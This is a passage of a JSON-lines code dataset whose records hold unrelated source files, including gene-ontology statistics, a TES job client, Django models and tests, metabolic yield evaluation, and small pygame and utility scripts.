Requires |A| > |B|, which is ensured when parsing the input lists.\"\"\"\n\n assert df.iloc[0].a > df.iloc[0].b, \"Gene set a not bigger than b; this is due to a\" \\\n \" bug - please report it.\"\n\n df[\"fisher\"] = df.apply(lambda row:\n fisher_exact([\n [row.b_I_go, row.b - row.b_I_go],\n [row.a_I_go - row.b_I_go,\n row.a - row.b - row.a_I_go + row.b_I_go]\n ], alternative=\"two-sided\")[1],\n axis=1)\n\n return df\n\n\n@MEMORY.cache(verbose=0)\ndef compute_go_overrepresentation_analysis(df):\n\n \"\"\"Compute p-val for gene list representation in GO category.\n\n Uses hypergeometric test, supposed to be similar to GOstats.\n \"\"\"\n\n df[\"a_hpgm_go\"] = df.apply(lambda row: hypergeom.sf(row[\"a_I_go\"] - 1,\n row[\"U\"],\n row[\"go_subtree\"],\n row[\"a\"]), axis=1)\n\n if \"b\" in df:\n df[\"b_hpgm_go\"] = df.apply(lambda row: hypergeom.sf(row[\"b_I_go\"] - 1,\n row[\"U\"],\n row[\"go_subtree\"],\n row[\"b\"]), axis=1)\n\n return df\n\n\ndef compute_fdr(df, columns):\n \"\"\"Computes the false discovery rate for a list of columns.\"\"\"\n\n for column in columns:\n cp = df[column]\n fdr_col = column + \"_fdr\"\n\n # Using the length of the vector without NAs because NAs indicate\n # that an experiment wasn't performed so you do not have to adjust\n # for it.\n df[fdr_col] = cp * len(cp.dropna()) / rankdata(cp)\n\n df.loc[df[fdr_col] > 1, fdr_col] = 1\n\n return df\n\n\ndef lap_ppv(df):\n\n \"\"\"Computes the Generalized Score Statistic for Comparison of PPVs\n\n (The generalized score statistic was proposed by Leisenring, Alonzo and Pepe\n (2000), hence the name lap_ppv.)\n\n This is a test used to compare the positive predictive value (PPV) of\n two gene lists with regards to the gene list associated with an ontology.\n\n That is, for three gene lists A and B and O (the genes associated\n with an ontology term), it computes the PPV for A and B with regards to O,\n then compares the two PPVs to see whether they are significantly different.\n\n For a gene list A and an ontology gene list O, the PPV is just\n\n PPV = TP/(TP + FP)\n\n where\n\n TP = A set subtract O\n\n while\n\n FP = A set intersect O.\n\n This method should be used when lists A and B are not disjoint and one list\n is not a proper subset of the other.\n\n Alternative description:\n\n 'Performs a test for differences in (positive and negative) predictive\n values of two binary diagnostic tests using a generalized score statistic\n proposed by Leisenring, Alonzo and Pepe'\n ( From https://cran.r-project.org/web/packages/DTComPair/DTComPair.pdf )\n\n Literature:\n\n Leisenring, W., Alonzo, T., and Pepe, M. S. (2000). 
Comparisons of\n    predictive values of binary medical diagnostic tests for paired designs.\n    Biometrics, 56(2):345-51.\n\n    Clara-Cecilie Gunther, Mette Langaas and Stian Lydersen, 2006: Statistical\n    Hypothesis Testing of Association Between Two Lists of Genes for a Given\n    Gene Class\n\n    Beisvaag et al 2006: GeneTools - application for functional annotation\n    and statistical hypothesis testing.\n    (The Leisenring test is described there as \"the intersecting target-target\n    situation\" and used in exactly the same way as here.)\n\n    ------------------------------------------------------------------------\n    This is the R code this function is based on (thanks Mette Langaas!)\n\n    LAPtestPPV <- function(datamat)\n    {\n    # takes in data in the form n1,n2,n3,...,n8\n    x1 <- datamat[,5]\n    n1 <- datamat[,1]+datamat[,5]\n    x2 <- datamat[,6]\n    n2 <- datamat[,2]+datamat[,6]\n    x3 <- datamat[,7]\n    n3 <- datamat[,3]+datamat[,7]\n\n    nA <- n1+n2\n    nB <- n1+n3\n\n    xAG <- x1+x2\n    xBG <- x1+x3\n\n    Dstrek <- (xAG+xBG)/(nA+nB)\n    Zstrek <- nB/(nA+nB)\n\n    teller2 <- (xBG-nB*(xAG+xBG)/(nA+nB))^2\n    # 6 sums: first 3 with G*: A∩B, A∩B*, A*∩B, then with G\n    nevner2 <-\n((0-Dstrek)^2)*((n1-x1)*(1-2*Zstrek)^2+(n2-x2)*(0-1*Zstrek)^2+(n3-x3)*(1-1*Zstrek)^2)+((1-Dstrek)^2)*(x1*(1-2*Zstrek)^2+x2*(0-1*Zstrek)^2+x3*(1-1*Zstrek)^2)\n\n\n    testobs <- teller2/nevner2\n    pvalchisq <- pchisq(testobs,1,lower.tail=F)\n    return(list(pval=pvalchisq,testobs=testobs))\n\n    }\n\n    \"\"\"\n\n    x1 = df[\"a_I_b\"]\n    n1 = x1 + df[\"a_I_b_I_go\"]\n    x2 = df[\"a_M_b_I_go\"]\n    n2 = x2 + df[\"a_I_b_I_go\"]\n    x3 = df[\"b_M_a_I_go\"]\n    n3 = df[\"a_I_b_I_go\"] + x3\n\n    nA = n1 + n2\n    nB = n1 + n3\n\n    xAG = x1 + x2\n    xBG = x1 + x3\n\n    d_prime = (xAG + xBG) / (nA + nB)\n    z_prime = nB / (nA + nB)\n\n    numerator = (xBG - nB * (xAG + xBG) / (nA + nB))**2\n\n    denominator = ((0 - d_prime)**2) * \\\n        ((n1 - x1) * (1 - 2 * z_prime)**2 + (n2 - x2)* \\\n        (0 - 1 * z_prime)**2+(n3 - x3)*(1 - 1 * z_prime)**2)+ \\\n        ((1 - d_prime)**2) * \\\n        (x1 * (1 - 2 * z_prime)**2 + x2 * (0 - 1 * z_prime)**2 + \\\n        x3 * (1 - 1 * z_prime)**2)\n\n    test_observation = numerator / denominator\n\n    df[\"chi_sq\"] = chisqprob(test_observation, 1)\n    df[\"test_obs\"] = test_observation\n\n    return df\n\n\ndef find_appropriate_statistical_test(gene_vectors):\n\n    \"\"\"Find the appropriate statistical test.\n\n    The statistical test to use to decide whether there is a statistically\n    significant difference between the overrepresentation of 1) gene list a in GO\n    and 2) gene list b in GO.\n\n    If there is only one input gene list, or the lists contain the same genes,\n    do not perform a significance test of the difference.\n\n    If one input gene list is a subset of the other, or they are disjoint,\n    use Fisher's Exact.\n\n    If the lists are intersecting, but they are not proper subsets/supersets of\n    each other, use the LAP test.\n    \"\"\"\n\n    if len(gene_vectors) == 1:\n        return \"NA\"\n\n    genes_a, genes_b = gene_vectors\n    genes_a, genes_b = set(genes_a), set(genes_b)\n\n    if genes_a == genes_b:\n        logging.warning(\"Gene list A is equal to B. 
Only hypergeometric tests\"\n \" are performed.\")\n return \"NA\"\n elif genes_b.issubset(genes_a): # a subset of b is impossible, |a| > |b|\n return \"FE_SUB\"\n elif not genes_a.intersection(genes_b):\n return \"FE\"\n else:\n # The gene lists are intersecting, but not proper\n # subsets so Fishers Exact can't be used.\n return \"LAP\"\n","sub_path":"go_overlap/statistics/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138510844","text":"# !/usr/local/python\n# coding: utf-8\n\nimport pygame.font\n\nclass Button():\n\n def __init__(self, setting, screen, message):\n\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n self.width = 150\n self.height = 50\n self.button_color = (0, 255, 0)\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 40)\n\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n self.pre_message(message)\n\n def pre_message(self, message):\n\n self.message_image = self.font.render(message, True, self.text_color, self.button_color)\n self.message_image_rect = self.message_image.get_rect()\n self.message_image_rect.center = self.rect.center\n\n def draw_button(self):\n\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.message_image, self.message_image_rect)","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"306867014","text":"# combo.py\n# created by Kaiwen Xu\n#\n# module related with combinatorics\nimport operator\n\n\ndef isPermutations(lst):\n\t\"\"\"Check whether numbers in the given list are permutations.\n\n\tArguments:\n\tlst -- list of numbers\n\t\"\"\"\n\tlength = 0\n\telements = {}\n\tfor i in xrange(0, len(lst)):\n\t\tnum = str(lst[i])\n\t\tif i == 0:\n\t\t\tlength = len(num)\n\t\t\tfor digit in num:\n\t\t\t\tif digit not in elements:\n\t\t\t\t\telements[digit] = 1\n\t\t\t\telse:\n\t\t\t\t\telements[digit] += 1\n\t\telse:\n\t\t\tif len(num) != length:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\te = {}\n\t\t\t\tfor digit in num:\n\t\t\t\t\tif digit not in e:\n\t\t\t\t\t\te[digit] = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\te[digit] += 1\n\t\t\t\telse:\n\t\t\t\t\tif e != elements:\n\t\t\t\t\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef nCk(n, k):\n\t\"\"\"n choose k.\n\t\"\"\"\n\treturn int(round(reduce(operator.mul, (float(n - i) / (i + 1) for i in xrange(k)), 1)))\n","sub_path":"combo.py","file_name":"combo.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"356112422","text":"#!/usr/bin/env python\nimport argparse\nimport re\nimport json\nimport urllib2\nfrom urlparse import urlparse\nfrom minio import Minio\nimport requests\nimport polling\nimport logging\n\n\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--repeat\", type=int, default=1)\nparser.add_argument(\"--server\", default=\"http://localhost:8000\")\nparser.add_argument(\"--wait\", action=\"store_true\")\nparser.add_argument(\"task\")\n\n\nclass TES:\n\n def __init__(self,\n url,\n s3_endpoint=None,\n s3_access_key=None,\n s3_secret_key=None):\n self.url = url\n self.s3_endpoint = s3_endpoint\n self.s3_access_key = s3_access_key\n self.s3_secret_key = 
s3_secret_key\n\n def get_service_info(self):\n req = urllib2.Request(\"%s/v1/jobs-service\" % (self.url))\n u = urllib2.urlopen(req)\n return json.loads(u.read())\n\n def s3connect(self):\n n = urlparse(self.s3_endpoint)\n tls = None\n if n.scheme == \"http\":\n tls = False\n if n.scheme == \"https\":\n tls = True\n minioClient = Minio(\n n.netloc,\n access_key=self.s3_access_key,\n secret_key=self.s3_secret_key,\n secure=tls\n )\n return minioClient\n\n def upload_file(self, path, storage):\n n = urlparse(storage)\n if n.scheme != \"s3\":\n raise Exception(\"Not S3 URL\")\n c = self.s3connect()\n object_name = n.path\n object_name = re.sub(\"^/\", \"\", object_name)\n c.fput_object(n.netloc, object_name, path)\n\n def download_file(self, path, storage):\n n = urlparse(storage)\n if n.scheme != \"s3\":\n raise Exception(\"Not S3 URL\")\n c = self.s3connect()\n object_name = n.path\n object_name = re.sub(\"^/\", \"\", object_name)\n c.fget_object(n.netloc, object_name, path)\n\n def list(self, bucket):\n c = self.s3connect()\n for i in c.list_objects(bucket):\n yield \"s3://%s/%s\" % (bucket, i.object_name)\n\n def make_bucket(self, bucket):\n c = self.s3connect()\n c.make_bucket(bucket)\n\n def bucket_exists(self, bucket):\n c = self.s3connect()\n c.bucket_exists(bucket)\n\n def submit(self, task):\n req = urllib2.Request(\"%s/v1/jobs\" % (self.url))\n u = urllib2.urlopen(req, json.dumps(task))\n data = json.loads(u.read())\n job_id = data['value']\n return job_id\n\n def wait(self, job_id, timeout=10):\n def check_success(data):\n return data[\"state\"] not in ['Queued', \"Running\", \"Initializing\"]\n return polling.poll(\n lambda: self.get_job(job_id),\n check_success=check_success,\n timeout=timeout,\n step=0.1)\n\n def get_job(self, job_id):\n return requests.get(\"%s/v1/jobs/%s\" % (self.url, job_id)).json()\n\n def delete_job(self, job_id):\n return requests.delete(\"%s/v1/jobs/%s\" % (self.url, job_id)).json()\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n c = TES(args.server)\n t = json.load(open(args.task))\n\n job_ids = []\n for i in range(args.repeat):\n job_id = c.submit(t)\n job_ids.append(job_id)\n\n if args.wait:\n for job_id in job_ids:\n c.wait(job_id)\n","sub_path":"python/py_tes.py","file_name":"py_tes.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"556217738","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/filebeat_delegate/publisher.py\n# Compiled at: 2019-06-16 05:47:41\n__author__ = 'Alexander.Li'\nimport json, boto3, logging, requests\nfrom utilities import SingletonMixin\nfrom errorbuster import formatError\n\nclass MailgunPublisher(SingletonMixin):\n\n def __init__(self):\n self.url = None\n self.key = None\n self.configure = None\n return\n\n def init_publisher(self, configure):\n self.url = ('https://api.mailgun.net/v3/{0.mg_domain}/messages').format(configure)\n self.key = configure.mg_key\n self.configure = configure\n\n def sendMessage(self, message):\n r = requests.post(self.url, auth=('api', self.key), data={'from': (' ').format(self.configure), 'to': [\n self.configure.mg_target, 'YOU@YOUR_DOMAIN_NAME'], \n 'subject': 'error report', \n 'text': message})\n logging.info(r.text)\n\n\nclass SNSPublisher(SingletonMixin):\n\n def __init__(self):\n self.sns = None\n self.topic = None\n 
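# the real SNS resource and topic are created in init_publisher() once the configuration is available\n        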
return\n\n    def init_publisher(self, configure):\n        self.sns = boto3.resource('sns', region_name=configure.aws_region, aws_access_key_id=configure.aws_key, aws_secret_access_key=configure.aws_secret)\n        self.topic = self.sns.Topic(configure.aws_topic)\n\n    def sendMessage(self, message):\n        payloads = json.dumps({'default': message})\n        try:\n            response = self.topic.publish(Message=payloads, MessageStructure='json')\n            logging.info('%s published with response %s', message, response)\n        except Exception as e:\n            logging.error(formatError(e))","sub_path":"pycfiles/filebeat_delegate-0.2.0.dev0-py2.7/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"418237357","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2016-4-12\n\n@author: N-286\n'''\nfrom CONFIG.InitDefaultPara import orgInit\n\nTongJiLieBiao={\n          'informationStatistics.yearMonth':'',\n          'informationStatistics.parentId':orgInit['DftQuOrgId'],\n          '_search':'false',\n          'rows':'-1',\n          'page':'1',\n          'sidx':'id',\n          'sord':'desc'\n          }\n# parameters for scoring an incident after it is closed\nPingFen={\n         'tqmobile':'true',\n         'publishUserId':'',\n         'id':'',\n         'score':''\n         }","sub_path":"testAPI/Web_Test/Interface/YunWeiPingTai/TongJiFenXi/TongJiFenXiPara.py","file_name":"TongJiFenXiPara.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"169060591","text":"# Author: Luis Mario Cervantes Ortiz, A01376958\n# Description: Report the total number of students in a school and the percentages of enrolled men and women\n\n# Write your program after this line.\nmuj=input(\"Numero de mujeres: \")\nhom=input(\"Numero de hombres: \")\nmuj=int(muj)\nhom=int(hom)\ntotal= (muj+hom)\nprint(\"Total de alumnos: \",total)\ntotal=int(total)\n\nPorcentajemuj=(((muj*100))/total)\nprint(\"Porcentaje de Mujeres: %.1f\" %Porcentajemuj)\nPorcentajehom=((hom*100)/total)\nprint(\"Porcentaje de Hombres: %.1f\" % Porcentajehom)","sub_path":"porcentajes.py","file_name":"porcentajes.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"335708115","text":"import textwrap\n\nfrom xmodule.tests.test_capa_module import CapaFactory\nfrom xmodule.modulestore.tests.factories import ItemFactory\nfrom course_dashboard.tests.base import BaseCourseDashboardTestCase\nfrom course_dashboard.answers_distribution_reports_manager import tasks\nfrom course_dashboard.answers_distribution import get_problem_module\n\nclass TestGradesReportManagerTasks(BaseCourseDashboardTestCase):\n\n    def test_get_problem_module_size(self):\n        \n        xml = textwrap.dedent(\"\"\"\n        \n        \n        \n        Apple\n        Banana\n        Chocolate\n        Donut\n        \n        \n

    HELLO

    \n \n \n Apple\n Banana\n Chocolate\n Donut\n \n \n
    \n \"\"\")\n \n problem_module = CapaFactory.create(xml=xml)\n self.assertEqual(2, tasks.get_problem_module_size(problem_module)) \n\n \n def test_create_header_row(self):\n self.assertEqual(['id', 'gender', 'year_of_birth', 'level_of_education','q1', 'q2', 'q3'],\n tasks.create_header_row(3))\n\n def test_create_list_of_question_id(self):\n problem_module_id = \"22220f82d19a42239ae45d73002633c6\"\n course_number = '1035'\n organisation = 'cnam'\n quizz_size = 2\n list_of_question_ids = [\"i4x-cnam-1035-problem-22220f82d19a42239ae45d73002633c6_2_1\",\n \"i4x-cnam-1035-problem-22220f82d19a42239ae45d73002633c6_3_1\"]\n \n self.assertEqual(tasks.create_list_of_question_ids(organisation,\n course_number,\n problem_module_id,\n quizz_size),\n list_of_question_ids)\n\n \n \n","sub_path":"course_dashboard/answers_distribution_reports_manager/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"365169462","text":"import argparse\nfrom OSC import OSCServer\nfrom socketIO_client import SocketIO, LoggingNamespace\n\nsocket = SocketIO('http://ehd2016.azurewebsites.net/', 80, LoggingNamespace)\nf = open('secret.txt', 'r')\nsecret = f.readline().rstrip('\\n')\nf.close()\n\ndef send(path, tags, args, source):\n print(path, args)\n toSend = {\n 'room': 'muse0',\n 'id': path,\n 'data': args,\n 'secret': secret,\n 'rapid': True\n }\n socket.emit('data', toSend)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"localhost\", help=\"The ip to listen on\")\n parser.add_argument(\"--port\", type=int, default=5001, help=\"The port to listen on\")\n args = parser.parse_args()\n\n server = OSCServer((args.ip, args.port))\n server.addMsgHandler(\"default\", send)\n server.serve_forever()\n","sub_path":"museosc/museosc.py","file_name":"museosc.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"563975268","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models, utils\nfrom django.db.models.signals import pre_delete\nfrom django.dispatch.dispatcher import receiver\nfrom django.forms import ValidationError\n\nfrom general_model import file_delete_default, metro_icon_default, filename_default, clean_text\nfrom general_model import print_list, get_ext\nfrom timeline.models import TimeSlot\nfrom timeline.utils import get_timeslot, get_timeslot_id\n\ntry:\n from django.contrib.auth.models import Group\n # mailing list options\n # do not remove items, as they might be stored in mailtemplates.\n mail_student_options = (\n ('all', 'All students'),\n ('10ectsstd', 'Students on marketplace with 10ECTS'),\n ('15ectsstd', 'Students on marketplace with 15ECTS'),\n ('distributedstd', 'Students with assigned project'),\n )\n mail_staff_options = tuple(Group.objects.all().values_list('name', 'name'))\n mail_staff_options += (\n ('staffnonfinishedproj', 'Staff with non-finished project'),\n ('distributedstaff', 'Staff with students'),\n ('staffnostudents', 'Staff with no students'),\n ('assessors', 'Presentation assessors and track heads'),\n )\nexcept utils.OperationalError:\n # happens during migrations\n mail_staff_options = ((), ())\n mail_student_options = ((), ())\n\n\nclass CapacityGroup(models.Model):\n ShortName = models.CharField(max_length=3)\n 
FullName = models.CharField(max_length=256)\n Administrators = models.ManyToManyField(User, related_name='administratorgroups',\n through='GroupAdministratorThrough')\n Head = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, related_name='capacity_group_head')\n\n def __str__(self):\n return self.ShortName\n\n def clean(self):\n # self.Info = clean_text(self.Info)\n self.FullName = clean_text(self.FullName)\n self.ShortName = clean_text(self.ShortName)\n\n\nclass GroupAdministratorThrough(models.Model):\n \"\"\"\n Through-model between User and CapacityGroup to store read/write access as groupadministrator\n Called via CapacityGroup.Administrators\n \"\"\"\n Group = models.ForeignKey(CapacityGroup, on_delete=models.CASCADE)\n User = models.ForeignKey(User, on_delete=models.CASCADE, related_name='administratoredgroups')\n Super = models.BooleanField(default=False, blank=True)\n\n\nclass MailTemplate(models.Model):\n \"\"\"\n Template for a mailing list mail\n \"\"\"\n RecipientsStudents = models.CharField(max_length=400)\n RecipientsStaff = models.CharField(max_length=400)\n Subject = models.CharField(max_length=400)\n Message = models.TextField()\n TimeStamp = models.DateTimeField(auto_now=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, null=True)\n\n def RecipientsStudentsList(self):\n return [dict(mail_student_options).get(a) for a in json.loads(self.RecipientsStudents)]\n\n def RecipientsStaffList(self):\n return [dict(mail_staff_options).get(a) for a in json.loads(self.RecipientsStaff)]\n\n def __str__(self):\n return '{} at {}'.format(self.Subject, self.TimeStamp)\n\n\nclass Mailing(models.Model):\n \"\"\"\n A mailing sent using the system.\n \"\"\"\n RecipientsStaff = models.ManyToManyField(User, related_name='received_mailings_staff', default=None, blank=True)\n RecipientsStudents = models.ManyToManyField(User, related_name='received_mailings_students', default=None, blank=True)\n Subject = models.CharField(max_length=400)\n Message = models.TextField()\n Sent = models.BooleanField(default=False)\n TimeStamp = models.DateTimeField(auto_now=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, null=True)\n\n def __str__(self):\n return '{} at {} (sent:{})'.format(self.Subject, self.TimeStamp, self.Sent)\n\n\nclass PublicFile(models.Model):\n \"\"\"\n Public file. Support staff can upload these and the files are shown for each user on the frontpage.\n \"\"\"\n\n def make_upload_path(instance, filename):\n \"\"\"\n Upload path for a public file. 
Stored in /media/public_files/{timeslot-id}/{uuid.ext}\n\n :param filename:\n :return:\n \"\"\"\n filename_new = filename_default(filename)\n return 'public_files/{0}/{1}'.format(str(get_timeslot().id), filename_new)\n\n Caption = models.CharField(max_length=200, blank=True, null=True)\n OriginalName = models.CharField(max_length=200, blank=True, null=True)\n File = models.FileField(default=None, upload_to=make_upload_path)\n TimeSlot = models.ForeignKey(TimeSlot, default=get_timeslot_id, on_delete=models.CASCADE,\n related_name='public_files')\n User = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE)\n TimeStamp = models.DateTimeField(auto_now=True, blank=True, null=True)\n Created = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n\n def metro_icon(self):\n return metro_icon_default(self)\n\n def __str__(self):\n return str(self.OriginalName) + \" - \" + str(self.Caption)\n\n def save(self, *args, **kwargs):\n # remove old file if this is a changed file\n try:\n this_old = PublicFile.objects.get(id=self.id)\n if this_old.File != self.File:\n this_old.File.delete(save=False)\n except PublicFile.DoesNotExist: # new image object\n pass\n super(PublicFile, self).save(*args, **kwargs)\n\n def clean(self):\n self.Caption = clean_text(self.Caption)\n if self.File:\n if get_ext(self.File.name) not in settings.ALLOWED_PUBLIC_FILES:\n raise ValidationError(\n 'This file type is not allowed. Allowed types: ' + print_list(settings.ALLOWED_PUBLIC_FILES))\n\n\n@receiver(pre_delete, sender=PublicFile)\ndef public_file_delete(sender, instance, **kwargs):\n \"\"\"\n Delete actual file if publicfile Object is removed\n\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n file_delete_default(sender, instance)\n","sub_path":"support/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"407144299","text":"# Copyright 2019 Novo Nordisk Foundation Center for Biosustainability,\n# Technical University of Denmark.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"Evaluate production levels and yields.\"\"\"\n\n\nimport logging\nfrom typing import Optional, Tuple\n\nimport cobra\nfrom cameo.strain_design.heuristic.evolutionary.objective_functions import (\n biomass_product_coupled_yield,\n product_yield,\n)\nfrom cobra.exceptions import OptimizationError\nfrom cobra.flux_analysis import pfba\nfrom cobra.flux_analysis.phenotype_phase_plane import (\n reaction_elements,\n reaction_weight,\n total_yield,\n)\nfrom numpy import isnan\n\n\n__all__ = (\"evaluate_production\", \"evaluate_biomass_coupled_production\")\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef evaluate_production(\n model: cobra.Model, production_id: str, carbon_source_id: str\n) -> Tuple[Optional[float], Optional[float], Optional[float], Optional[float]]:\n \"\"\"\n Evaluate the production levels in the specific model conditions.\n\n Warnings\n 
--------\n This function is expected to be called within a context since it modifies\n the model's objective.\n\n Parameters\n ----------\n model : cobra.Model\n The constraint-based metabolic model of the production organism.\n production_id : str\n The identifier of the reaction representing production, for example,\n a demand reaction on the compound.\n carbon_source_id : str\n The identifier of the reaction representing carbon uptake, for example,\n a glucose exchange reaction.\n\n Returns\n -------\n tuple\n float or None\n The theoretical maximum production rate if any.\n float or None\n The maximal product flux yield if any.\n float or None\n The maximal product carbon yield if any.\n float or None\n The maximal product yield by weight if any.\n\n \"\"\"\n pyield = product_yield(production_id, carbon_source_id)\n # Compute the number of weighted carbon atoms.\n carbon_uptake = model.reactions.get_by_id(carbon_source_id)\n production = model.reactions.get_by_id(production_id)\n input_components = [reaction_elements(carbon_uptake)]\n output_components = reaction_elements(production)\n # Compute the masses.\n try:\n input_weights = [reaction_weight(carbon_uptake)]\n output_weight = reaction_weight(production)\n # If the reactions are ill-defined or the metabolite weight is unknown.\n except (ValueError, TypeError):\n input_weights = []\n output_weight = []\n try:\n model.objective = production_id\n solution = model.optimize()\n production_flux = solution[production_id]\n except OptimizationError as error:\n logger.error(\n \"Could not determine production due to a solver error. %r\", error\n )\n production_flux = None\n production_flux_yield = None\n production_carbon_yield = None\n production_mass_yield = None\n else:\n try:\n production_flux_yield = pyield(model, solution, None)\n except ZeroDivisionError:\n logger.error(\"Division by zero in yield calculation.\")\n production_flux_yield = None\n production_carbon_yield = total_yield(\n [solution[carbon_source_id]],\n input_components,\n solution[production_id],\n output_components,\n )\n if isnan(production_carbon_yield):\n production_carbon_yield = None\n production_mass_yield = total_yield(\n [solution[carbon_source_id]],\n input_weights,\n solution[production_id],\n output_weight,\n )\n if isnan(production_mass_yield):\n production_mass_yield = None\n\n return (\n production_flux,\n production_flux_yield,\n production_carbon_yield,\n production_mass_yield,\n )\n\n\ndef evaluate_biomass_coupled_production(\n model: cobra.Model,\n production_id: str,\n biomass_id: str,\n carbon_source_id: str,\n) -> Tuple[Optional[float], Optional[float]]:\n \"\"\"\n Evaluate the biomass coupled production levels in the specific conditions.\n\n Warnings\n --------\n This function is expected to be called within a context since it modifies\n the model's objective.\n\n Parameters\n ----------\n model : cobra.Model\n The constraint-based metabolic model of the production organism.\n production_id : str\n The identifier of the reaction representing production, for example,\n a demand reaction on the compound.\n biomass_id : str\n The identifier of the reaction representing biomass accumulation, i.e.,\n growth.\n carbon_source_id : str\n The identifier of the reaction representing carbon uptake, for example,\n a glucose exchange reaction.\n\n Returns\n -------\n tuple\n float or None\n The theoretical maximum growth rate if any.\n float or None\n The maximum biomass coupled product yield if any.\n\n \"\"\"\n bpcy = biomass_product_coupled_yield(\n 
biomass_id, production_id, carbon_source_id\n    )\n    try:\n        model.objective = biomass_id\n        solution = pfba(model)\n        growth = solution[biomass_id]\n    except OptimizationError as error:\n        logger.error(\n            \"Could not determine biomass coupled production due to a solver \"\n            \"error. %r\",\n            error,\n        )\n        growth = None\n        bpc_yield = None\n    else:\n        try:\n            bpc_yield = bpcy(model, solution, None)\n        except ZeroDivisionError:\n            logger.error(\"Division by zero in yield calculation.\")\n            bpc_yield = None\n    return growth, bpc_yield\n","sub_path":"src/metabolic_ninja/worker/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
{"seq_id":"370375590","text":"import argparse\nfrom app.file_sentiment_extractor import FileSentimentExtractor\n\n\"\"\"\nExample:\npython features.py --hotel-data \"datasets/Tripadvisor Review Part1.xlsx\" --save\n\"\"\"\n\nparser = argparse.ArgumentParser()\n#parser.add_argument('--crime-data', metavar='C', nargs='?')\nparser.add_argument('--hotel-data', metavar='H', nargs='?')\nparser.add_argument('--save', action='store', const=True, nargs='?')\n\nargs = parser.parse_args()\n\noutput_file = args.save if args.save else False\n\nif args.hotel_data:\n    sent_ext = FileSentimentExtractor()\n    sent_ext.process_file(args.hotel_data, output_file)\nelse:\n    print(\"Nothing to do\")\n    ","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
{"seq_id":"261799280","text":"import pytest\n\nimport algorithms.online.geeks.even_odd as seg\n\n\n@pytest.mark.math\n@pytest.mark.array\nclass TestEvenOdd:\n    @staticmethod\n    def verify(arr):\n        lo = 0\n        hi = len(arr) - 1\n        while arr[lo] % 2 == 0 and lo < hi:\n            if arr[lo + 1] % 2 == 1:\n                break\n            lo += 1\n        while arr[hi] % 2 == 1 and lo < hi:\n            if arr[hi - 1] % 2 == 0:\n                break\n            hi -= 1\n        assert 0 <= hi - lo <= 1\n\n    def test_even_odd_sample(self):\n        arr = [12, 34, 45, 9, 8, 90, 3]\n        result = seg.even_odd(arr)\n        self.verify(result)\n\n    def test_even_odd_zigzag(self):\n        arr = [1, 2, 3, 4, 5, 6]\n        result = seg.even_odd(arr)\n        self.verify(result)\n\n    def test_even_odd_done(self):\n        arr = [2, 4, 1, 3]\n        result = seg.even_odd(arr)\n        self.verify(result)\n\n    def test_even_odd_done_all_odd(self):\n        arr = [1, 3, 5, 7]\n        result = seg.even_odd(arr)\n        self.verify(result)\n\n    def test_even_odd_done_all_even(self):\n        arr = [2, 4, 6, 8]\n        result = 